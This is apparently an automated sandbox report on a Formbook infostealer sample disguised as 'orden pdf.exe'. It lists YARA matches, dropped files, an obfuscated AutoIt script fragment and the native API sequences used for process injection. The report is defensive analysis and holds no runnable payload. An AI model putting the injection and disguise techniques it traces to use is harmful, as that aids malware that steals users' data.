Source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
AutoIt script contains suspicious strings
Source: orden pdf.exe AutoIt Script: 66663092 $HANDLE = DLLCALLADDRESS (MTDUDAQCWRWM ("667
Source: DeviceCensus.exe.exe.0.dr AutoIt Script: 66663092 $HANDLE = DLLCALLADDRESS (MTDUDAQCWRWM ("667
Source: cx9l_rq2dula.exe.3.dr AutoIt Script: 66663092 $HANDLE = DLLCALLADDRESS (MTDUDAQCWRWM ("667
Binary is likely a compiled AutoIt script file
Source: C:\Users\user\Desktop\orden pdf.exe Code function: This is a third-party compiled AutoIt script. 0_2_00173D19
Source: orden pdf.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: orden pdf.exe, 00000000.00000002.252510158.000000000021E000.00000002.00020000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
Source: C:\Users\user\Desktop\orden pdf.exe Code function: This is a third-party compiled AutoIt script. 1_2_00173D19
Source: orden pdf.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: orden pdf.exe, 00000001.00000002.233175042.000000000021E000.00000002.00020000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
Source: orden pdf.exe, 00000002.00000002.299374957.000000000021E000.00000002.00020000.sdmp String found in binary or memory: This is a third-party compiled AutoIt script.
Source: orden pdf.exe, 00000002.00000002.299374957.000000000021E000.00000002.00020000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
Contains functionality to call native functions
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_3_014600AD NtOpenSection,NtMapViewOfSection, 0_3_014600AD
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_3_01461C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtTerminateProcess,NtUnmapViewOfSection,NtWriteVirtualMemory,NtGetContextThread,NtSetContextThread,NtResumeThread, 0_3_01461C09
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00419850 NtCreateFile, 2_2_00419850
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00419900 NtReadFile, 2_2_00419900
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00419980 NtClose, 2_2_00419980
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00419A30 NtAllocateVirtualMemory, 2_2_00419A30
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_004198FA NtReadFile, 2_2_004198FA
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0041997A NtClose, 2_2_0041997A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00419A2A NtAllocateVirtualMemory, 2_2_00419A2A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_017A9910
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A99A0 NtCreateSection,LdrInitializeThunk, 2_2_017A99A0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_017A9860
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9840 NtDelayExecution,LdrInitializeThunk, 2_2_017A9840
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A98F0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_017A98F0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9A50 NtCreateFile,LdrInitializeThunk, 2_2_017A9A50
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9A20 NtResumeThread,LdrInitializeThunk, 2_2_017A9A20
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_017A9A00
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9540 NtReadFile,LdrInitializeThunk, 2_2_017A9540
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A95D0 NtClose,LdrInitializeThunk, 2_2_017A95D0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9710 NtQueryInformationToken,LdrInitializeThunk, 2_2_017A9710
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A97A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_017A97A0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9780 NtMapViewOfSection,LdrInitializeThunk, 2_2_017A9780
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_017A9660
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A96E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_017A96E0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9950 NtQueueApcThread, 2_2_017A9950
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A99D0 NtCreateProcessEx, 2_2_017A99D0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017AB040 NtSuspendThread, 2_2_017AB040
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9820 NtEnumerateKey, 2_2_017A9820
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A98A0 NtWriteVirtualMemory, 2_2_017A98A0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9B00 NtSetValueKey, 2_2_017A9B00
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017AA3B0 NtGetContextThread, 2_2_017AA3B0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9A10 NtQuerySection, 2_2_017A9A10
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9A80 NtOpenDirectoryObject, 2_2_017A9A80
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9560 NtWriteFile, 2_2_017A9560
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017AAD30 NtSetContextThread, 2_2_017AAD30
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9520 NtWaitForSingleObject, 2_2_017A9520
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A95F0 NtQueryInformationFile, 2_2_017A95F0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9770 NtSetInformationFile, 2_2_017A9770
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017AA770 NtOpenThread, 2_2_017AA770
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9760 NtOpenProcess, 2_2_017A9760
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9730 NtQueryVirtualMemory, 2_2_017A9730
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017AA710 NtOpenProcessToken, 2_2_017AA710
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9FE0 NtCreateMutant, 2_2_017A9FE0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9670 NtQueryInformationProcess, 2_2_017A9670
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9650 NtQueryValueKey, 2_2_017A9650
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A9610 NtEnumerateValueKey, 2_2_017A9610
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017A96D0 NtCreateKey, 2_2_017A96D0
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Code function: 5_3_00CE00AD NtOpenSection,NtMapViewOfSection, 5_3_00CE00AD
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B6606: CreateFileW,DeviceIoControl,CloseHandle, 0_2_001B6606
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001AACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_001AACC5
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_001B79D3
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001B79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 1_2_001B79D3
Detected potential crypto function
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0017E3B0 0_2_0017E3B0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_00183200 0_2_00183200
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_00183B70 0_2_00183B70
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001A410F 0_2_001A410F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001902A4 0_2_001902A4
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001A038E 0_2_001A038E
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001A467F 0_2_001A467F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001906D9 0_2_001906D9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001DAACE 0_2_001DAACE
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001A4BEF 0_2_001A4BEF
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0019CCC1 0_2_0019CCC1
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_00176F07 0_2_00176F07
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0017AF50 0_2_0017AF50
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0019B043 0_2_0019B043
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0018B11F 0_2_0018B11F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0019D1B9 0_2_0019D1B9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001D31BC 0_2_001D31BC
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0019123A 0_2_0019123A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001A724D 0_2_001A724D
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B13CA 0_2_001B13CA
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001793F0 0_2_001793F0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0018F563 0_2_0018F563
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001796C0 0_2_001796C0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001BB6CC 0_2_001BB6CC
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001777B0 0_2_001777B0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001DF7FF 0_2_001DF7FF
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001A79C9 0_2_001A79C9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0018FA57 0_2_0018FA57
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_00179B60 0_2_00179B60
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_00177D19 0_2_00177D19
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0018FE6F 0_2_0018FE6F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_00199ED0 0_2_00199ED0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001A410F 1_2_001A410F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001902A4 1_2_001902A4
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001A038E 1_2_001A038E
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_0017E3B0 1_2_0017E3B0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001A467F 1_2_001A467F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001906D9 1_2_001906D9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001DAACE 1_2_001DAACE
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001A4BEF 1_2_001A4BEF
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_0019CCC1 1_2_0019CCC1
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_00176F07 1_2_00176F07
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_0017AF50 1_2_0017AF50
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_0019B043 1_2_0019B043
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_0018B11F 1_2_0018B11F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_0019D1B9 1_2_0019D1B9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001D31BC 1_2_001D31BC
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_00183200 1_2_00183200
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_0019123A 1_2_0019123A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001A724D 1_2_001A724D
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001B13CA 1_2_001B13CA
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001793F0 1_2_001793F0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_0018F563 1_2_0018F563
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001796C0 1_2_001796C0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001BB6CC 1_2_001BB6CC
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001777B0 1_2_001777B0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001DF7FF 1_2_001DF7FF
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001A79C9 1_2_001A79C9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_0018FA57 1_2_0018FA57
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_00183B70 1_2_00183B70
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_00179B60 1_2_00179B60
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_00177D19 1_2_00177D19
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_0018FE6F 1_2_0018FE6F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_00199ED0 1_2_00199ED0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_00177FA3 1_2_00177FA3
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0041D80C 2_2_0041D80C
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00401027 2_2_00401027
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00401030 2_2_00401030
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0041D141 2_2_0041D141
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00401176 2_2_00401176
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0041C9D9 2_2_0041C9D9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0041CC95 2_2_0041CC95
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00402D88 2_2_00402D88
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00402D90 2_2_00402D90
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0041DF0C 2_2_0041DF0C
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00409F80 2_2_00409F80
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00402FB0 2_2_00402FB0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01784120 2_2_01784120
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0176F900 2_2_0176F900
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01821002 2_2_01821002
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0177B090 2_2_0177B090
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0179EBB0 2_2_0179EBB0
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01760D20 2_2_01760D20
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01831D55 2_2_01831D55
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01786E30 2_2_01786E30
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Code function: 5_2_01383200 5_2_01383200
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Code function: 5_2_013A410F 5_2_013A410F
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Code function: 5_2_0138F563 5_2_0138F563
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Code function: 5_2_0139B043 5_2_0139B043
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Code function: 5_2_01376F07 5_2_01376F07
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Code function: 5_2_01379B60 5_2_01379B60
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Code function: 5_2_013777B0 5_2_013777B0
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Code function: 5_2_013A4BEF 5_2_013A4BEF
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Code function: 5_2_01399ED0 5_2_01399ED0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\orden pdf.exe Code function: String function: 00197E58 appears 46 times
Source: C:\Users\user\Desktop\orden pdf.exe Code function: String function: 0017CB37 appears 48 times
Source: C:\Users\user\Desktop\orden pdf.exe Code function: String function: 0019F8A0 appears 68 times
Source: C:\Users\user\Desktop\orden pdf.exe Code function: String function: 0018EC2F appears 136 times
Source: C:\Users\user\Desktop\orden pdf.exe Code function: String function: 0018F55E appears 41 times
Source: C:\Users\user\Desktop\orden pdf.exe Code function: String function: 00196AC0 appears 83 times
Source: C:\Users\user\Desktop\orden pdf.exe Code function: String function: 00182C20 appears 42 times
Source: C:\Users\user\Desktop\orden pdf.exe Code function: String function: 00190FA7 appears 42 times
Source: C:\Users\user\Desktop\orden pdf.exe Code function: String function: 0018D17C appears 38 times
Source: C:\Users\user\Desktop\orden pdf.exe Code function: String function: 0019185B appears 36 times
Source: C:\Users\user\Desktop\orden pdf.exe Code function: String function: 0017CE19 appears 51 times
Source: C:\Users\user\Desktop\orden pdf.exe Code function: String function: 0018DCBE appears 41 times
PE file contains strange resources
Source: orden pdf.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: orden pdf.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: orden pdf.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: orden pdf.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DeviceCensus.exe.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DeviceCensus.exe.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DeviceCensus.exe.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DeviceCensus.exe.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cx9l_rq2dula.exe.3.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cx9l_rq2dula.exe.3.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cx9l_rq2dula.exe.3.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cx9l_rq2dula.exe.3.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: orden pdf.exe, 00000000.00000003.249639014.0000000001521000.00000004.00000001.sdmp Binary or memory string: OriginalFilename vs orden pdf.exe
Source: orden pdf.exe, 00000000.00000003.249639014.0000000001521000.00000004.00000001.sdmp Binary or memory string: FV_ORIGINALFILENAMEF vs orden pdf.exe
Source: orden pdf.exe, 00000000.00000003.250755956.00000000014AA000.00000004.00000001.sdmp Binary or memory string: FV_ORIGINALFILENAMEN vs orden pdf.exe
Source: orden pdf.exe, 00000000.00000003.250755956.00000000014AA000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameo\ vs orden pdf.exe
Source: orden pdf.exe, 00000002.00000002.300447868.000000000185F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs orden pdf.exe
Source: orden pdf.exe, 00000002.00000002.300214907.0000000001733000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamesystray.exej% vs orden pdf.exe
Uses 32bit PE files
